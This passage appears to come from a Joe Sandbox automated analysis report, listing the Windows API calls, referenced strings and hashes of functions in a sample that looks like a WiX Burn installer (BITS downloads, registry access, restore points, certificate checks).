Instruction ID: 21f4dd9b0137aef3fb6791025aa9863b099853d7a31dc3e86ec8f712e6c97542
Opcode Fuzzy Hash: badf74c848326701220bd39735ff2f5e9d8c2e3f123b4dbbc97eec4b1bce997e
Instruction Fuzzy Hash: CE01DB32996619B7DF13A7D4CC06F9F7A6CAF40720F128152F800B6240DB759E40D7D5

Function 009D4153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009D4440: FindFirstFileW.KERNEL32(009B923A,?,00000100,00000000,00000000), ref: 009D447B
Part of subcall function 009D4440: FindClose.KERNEL32(00000000), ref: 009D4487

SetFileAttributesW.KERNEL32(009B923A,00000080,00000000,009B923A,000000FF,00000000,?,?,009B923A), ref: 009D4182
GetLastError.KERNEL32(?,?,009B923A), ref: 009D418C
DeleteFileW.KERNEL32(009B923A,00000000,009B923A,000000FF,00000000,?,?,009B923A), ref: 009D41AC
GetLastError.KERNEL32(?,?,009B923A), ref: 009D41B6

Strings

fileutil.cpp, xrefs: 009D41D1

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: 4285d9166bed393c0c065bad647fa2c8c17ac4396f6cc7a3a41e24d90eb946b1
Instruction ID: f28b4871fd78eb0cdd34a2034a25637ec919d23f65c08e9cb3ced78d3f5ca519
Opcode Fuzzy Hash: 4285d9166bed393c0c065bad647fa2c8c17ac4396f6cc7a3a41e24d90eb946b1
Instruction Fuzzy Hash: 0601D632ACA639E7DB314AA6CC05B5B7E9CAF34760F018612FD54F6390D7318D8095D0

Function 009BDA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009BDA1A
LeaveCriticalSection.KERNEL32(?), ref: 009BDA5F
SetEvent.KERNEL32(?,?,?,?), ref: 009BDA73

Strings

Failure while sending progress during BITS job modification., xrefs: 009BDA4E
Failed to get state during job modification., xrefs: 009BDA33

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
Opcode ID: e1e8dee754f6742ca58188193e275382892817f7b042f1a6981b15785d809033
Instruction ID: 0987fcc991e31df4e2c4ea69ce080f5fcbf60053b480f14720d2474de1db4f89
Opcode Fuzzy Hash: e1e8dee754f6742ca58188193e275382892817f7b042f1a6981b15785d809033
Instruction Fuzzy Hash: F601DE32A4A629FBCB11DB55C948AAEB7ACFF94335B00820AE904D3240E730AA44C7D0

Function 009BDC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,009BDDEE), ref: 009BDC92
LeaveCriticalSection.KERNEL32(00000008,?,009BDDEE), ref: 009BDCD7
SetEvent.KERNEL32(?,?,009BDDEE), ref: 009BDCEB

Strings

Failed to get BITS job state., xrefs: 009BDCAB
Failure while sending progress., xrefs: 009BDCC6

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: 08f0c4585412f1d4f996b5bf29dcd7552e39f3f6b4fb61f086099aac1869fe7d
Instruction ID: 549e13d8f8520428ab53c2c2c7eff7b36e91a30a1fd0a0ba72cc1e1c80ecbc80
Opcode Fuzzy Hash: 08f0c4585412f1d4f996b5bf29dcd7552e39f3f6b4fb61f086099aac1869fe7d
Instruction Fuzzy Hash: 6E01F132A06A29EBCB119B45DA49AEABBACFF44330B00415AFA0493600EB70ED44C7D4

Function 009BD7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,009BDF52,?,?,?,?,?,?,00000000,00000000), ref: 009BD802
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,009BDF52,?,?,?,?,?,?,00000000,00000000), ref: 009BD80D
GetLastError.KERNEL32(?,009BDF52,?,?,?,?,?,?,00000000,00000000), ref: 009BD81A

Strings

bitsengine.cpp, xrefs: 009BD83E
Failed to create BITS job complete event., xrefs: 009BD848

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsengine.cpp
API String ID: 3069647169-3441864216
Opcode ID: a89ed85a23740e820b7d10b14f80d29b7a050e2acf7ddf8aa24aaaac74ebf4ea
Instruction ID: cc261c1335a5fa5f207d62d0d3ea2d9af603201ed7693f8fd7787e6567f018dd
Opcode Fuzzy Hash: a89ed85a23740e820b7d10b14f80d29b7a050e2acf7ddf8aa24aaaac74ebf4ea
Instruction Fuzzy Hash: 7601D872952636ABC7109F5AD905A86BFACFF49B71B014116FE18E7641E770D800CBE4

Function 0099D4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,009A7040,000000B8,00000000,?,00000000,76C1B390), ref: 0099D4B7
InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0099D4C6
LeaveCriticalSection.KERNEL32(000000D0,?,009A7040,000000B8,00000000,?,00000000,76C1B390), ref: 0099D4DB

Strings

Engine active cannot be changed because it was already in that state., xrefs: 0099D4FE
userexperience.cpp, xrefs: 0099D4F4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: 9f6ede73e81e508d39e74a712188f0ee15350c8be9a01a6597f306df18078305
Instruction ID: 325e472d02f4445387f2b53453872a3d02730dd54013489291a024d91a02ea4e
Opcode Fuzzy Hash: 9f6ede73e81e508d39e74a712188f0ee15350c8be9a01a6597f306df18078305
Instruction Fuzzy Hash: 95F0AF36385208AF9B209FAADCC5D97B7BCFBD5765301442AF606D3290DB70E9058770

Function 009D1C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 009D1CB3
GetLastError.KERNEL32(?,009949DA,00000001,?,?,00994551,?,?,?,?,00995466,?,?,?,?), ref: 009D1CC2

Strings

srputil.cpp, xrefs: 009D1CE3
srclient.dll, xrefs: 009D1C91
SRSetRestorePointW, xrefs: 009D1CA8

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 199729137-398595594
Opcode ID: e54315c1896588836254190f5554dcb9b7c9b70a0f12972b848ae34d788a15c8
Instruction ID: 668d27eef73cf5c35599c2cc0fe6df794ebc82574b6e4d94c5cdac5be9b889a9
Opcode Fuzzy Hash: e54315c1896588836254190f5554dcb9b7c9b70a0f12972b848ae34d788a15c8
Instruction Fuzzy Hash: B001D637AE533AB7C7211AF6DC05B2629455B407A5F018123EE40EF3A0D720CC80D7D5

Function 009C495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009C490E,00000000,?,009C48AE,00000000,009F7F08,0000000C,009C4A05,00000000,00000002), ref: 009C497D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009C4990
FreeLibrary.KERNEL32(00000000,?,?,?,009C490E,00000000,?,009C48AE,00000000,009F7F08,0000000C,009C4A05,00000000,00000002), ref: 009C49B3

Strings

mscoree.dll, xrefs: 009C4976
CorExitProcess, xrefs: 009C4988

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 61c5b5b7d445b63ed37fe04d83c951dd8074e64ce0569d02db622271a92796ad
Instruction ID: 1bf60bc51375b7a7af9760f5c8b32426e7b27403004311dca3059ba7941a184e
Opcode Fuzzy Hash: 61c5b5b7d445b63ed37fe04d83c951dd8074e64ce0569d02db622271a92796ad
Instruction Fuzzy Hash: EAF04F35A5921CFFCB119F90DC29BAEBFB8EB44B15F01416AF905A2150CB714A80DB95

Function 009A9287 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 009A93C9

Part of subcall function 009D56CF: GetLastError.KERNEL32(?,?,009A933A,?,00000003,00000000,?), ref: 009D56EE

Strings

Failed to find expected public key in certificate chain., xrefs: 009A938A
Failed to get certificate public key identifier., xrefs: 009A93F7
cache.cpp, xrefs: 009A93ED
Failed to read certificate thumbprint., xrefs: 009A93BD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
API String ID: 1452528299-3408201827
Opcode ID: 3e6be050c9a9a645c63e738ac6cb054b7f2c05183de51934c52cda4bdc679d51
Instruction ID: 915e58f23ed7d52d294cb7ebd2240aaed8de44dbdd2c6ec6259ae9c51f1ce159
Opcode Fuzzy Hash: 3e6be050c9a9a645c63e738ac6cb054b7f2c05183de51934c52cda4bdc679d51
Instruction Fuzzy Hash: 17415172E00619AFDF10DFA9C841AAEB7B8BF49714F054125FA05E7291DA74ED00CBE0

Function 009921AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 009921F2
GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 009921FE

Part of subcall function 00993BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BDB
Part of subcall function 00993BD3: HeapSize.KERNEL32(00000000,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BE2

Strings

strutil.cpp, xrefs: 00992222

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: c0b1cfe35328987a07e277b991ac5374cf6c8fd76ce91d2e688a0caf280c7d7d
Instruction ID: 1a8b6097b5f6588efe1f48f9ebbfc310a9fa56a676d4e283c1d7504aad9d2b08
Opcode Fuzzy Hash: c0b1cfe35328987a07e277b991ac5374cf6c8fd76ce91d2e688a0caf280c7d7d
Instruction Fuzzy Hash: 9631273260522ABBDF288FADCC44A6E3B99AF55774B214225FD219F290E731CC4097E0

Function 009D94FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 009D95D5
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 009D9610
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 009D962C
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 009D9639
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 009D9646

Part of subcall function 009D0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009D95C2,00000001), ref: 009D0FED

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 3ca4d3d0c90e9214e9998ea9856ceea2854d01bd8fc54cc37f2dcdd9b73d6e60
Instruction ID: 0dfb62d80ea4d257516c357f57a166d32bb1f04e4a76f1594a6f663bf9499b7e
Opcode Fuzzy Hash: 3ca4d3d0c90e9214e9998ea9856ceea2854d01bd8fc54cc37f2dcdd9b73d6e60
Instruction Fuzzy Hash: 98413B72C4122DFFCF21AF948D81AADFAB9EF54750F51816BE91476221D3318E509B90

Function 00998A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00998BC8,0099972D,?,0099972D,?,?,0099972D,?,?), ref: 00998A27
lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00998BC8,0099972D,?,0099972D,?,?,0099972D,?,?), ref: 00998A2F
CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00998BC8,0099972D,?,0099972D,?), ref: 00998A7E
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00998BC8,0099972D,?,0099972D,?), ref: 00998AE0
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00998BC8,0099972D,?,0099972D,?), ref: 00998B0D

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString$lstrlen
String ID:
API String ID: 1657112622-0
Opcode ID: 739528b8a867bfe5a7982fc1dd4e6c75ed668d1914a5ac5d9b6f06d4ebe7d649
Instruction ID: 8b9580047bb2d81d5ee899a53a27c206304b3a01442cdc52b9fe5356e70b6b17
Opcode Fuzzy Hash: 739528b8a867bfe5a7982fc1dd4e6c75ed668d1914a5ac5d9b6f06d4ebe7d649
Instruction Fuzzy Hash: F3312F72A06118FFCF258E5CCC89AAF3F6EEB4A750F15441BF91987210CA759990DBA0

Function 009974B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(009953BD,WixBundleOriginalSource,?,?,009AA623,840F01E8,WixBundleOriginalSource,?,009FAA90,?,00000000,00995445,00000001,?,?,00995445), ref: 009974C3
LeaveCriticalSection.KERNEL32(009953BD,009953BD,00000000,00000000,?,?,009AA623,840F01E8,WixBundleOriginalSource,?,009FAA90,?,00000000,00995445,00000001,?), ref: 0099752A

Strings

Failed to get value as string for variable: %ls, xrefs: 00997519
Failed to get value of variable: %ls, xrefs: 009974FD
WixBundleOriginalSource, xrefs: 009974BF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
API String ID: 3168844106-30613933
Opcode ID: 508ee686b55595e1b5b8bb1a9b3b7a94086a41851092e82ea8ba49682af941cc
Instruction ID: f833bd04af8c76b8133d74cb512516dafa975248b68366dfad7277184db81f02
Opcode Fuzzy Hash: 508ee686b55595e1b5b8bb1a9b3b7a94086a41851092e82ea8ba49682af941cc
Instruction Fuzzy Hash: DA01B1729A9129FBCF225E88CC05B9EBF69EF50725F128161FD04A6231CB369E1097D1

Function 009BD152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,009BD148,00000000), ref: 009BD16D
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,009BD148,00000000), ref: 009BD179
CloseHandle.KERNEL32(009DB518,00000000,?,00000000,?,009BD148,00000000), ref: 009BD186
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,009BD148,00000000), ref: 009BD193
UnmapViewOfFile.KERNEL32(009DB4E8,00000000,?,009BD148,00000000), ref: 009BD1A2

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: df4a357ecb508e5b0829a380a619ae62a56023accd0f831f3edc671ce3048266
Instruction ID: da4673832470d8d6cd1872bf33596e2d069d7f32d2bc2776021032d335601424
Opcode Fuzzy Hash: df4a357ecb508e5b0829a380a619ae62a56023accd0f831f3edc671ce3048266
Instruction Fuzzy Hash: 06011976406B19DFCB35AFAADA80856F7E9FF50721315C93EE1A652930D371A880DF40

Function 009D8713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 009D8820
GetLastError.KERNEL32 ref: 009D882A

Strings

clbcatq.dll, xrefs: 009D8731, 009D873C
timeutil.cpp, xrefs: 009D884E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Time$ErrorFileLastSystem
String ID: clbcatq.dll$timeutil.cpp
API String ID: 2781989572-961924111
Opcode ID: cda8b8f5303f61c3d9a5cf37bba3f40c7588be5b5bdbbab110c389af0ecd1627
Instruction ID: 63ad7c6721470cf22fc6fb111a966fbeb3c96bc3cf31042fb0c87878578bda5f
Opcode Fuzzy Hash: cda8b8f5303f61c3d9a5cf37bba3f40c7588be5b5bdbbab110c389af0ecd1627
Instruction Fuzzy Hash: 6B411776E9020576D7209BB88D05BBF7779AF91700F64852AB511A7381EE35CE0193A1

Function 009D36CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(000002C0), ref: 009D36E6
SysAllocString.OLEAUT32(?), ref: 009D36F6
VariantClear.OLEAUT32(?), ref: 009D37D5

Strings

xmlutil.cpp, xrefs: 009D370E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: 2ecea191a6cbbebdef3d63b996ed701333e0776477c7a9620ce320ab7e209b99
Instruction ID: 0c78fe0ad1ba04c3b477a06287c7f6b2862d82646cbd3c94bc4357a74a1b625e
Opcode Fuzzy Hash: 2ecea191a6cbbebdef3d63b996ed701333e0776477c7a9620ce320ab7e209b99
Instruction Fuzzy Hash: 054167B5A41629ABCB109FA5C888EAFBBACAF45711F15C1A5FC05EB301D634DE00CB91

Function 009D0E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,009B8E1B), ref: 009D0EAA
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009B8E1B,00000000), ref: 009D0EC8
RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,009B8E1B,00000000,00000000,00000000), ref: 009D0F1E

Strings

regutil.cpp, xrefs: 009D0EEE

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: 5c6ff408d13745730c555f650ddf1abcd33178da1f365424774b57e9a59479be
Instruction ID: e683b2805054769e68d5897532081c56c9a2c15538ed8bd5a98a87d35077c84f
Opcode Fuzzy Hash: 5c6ff408d13745730c555f650ddf1abcd33178da1f365424774b57e9a59479be
Instruction Fuzzy Hash: E931A576941129FBDB218B99CC40BAFB76DEF84750F258456BD04E7310D7718E0096A0

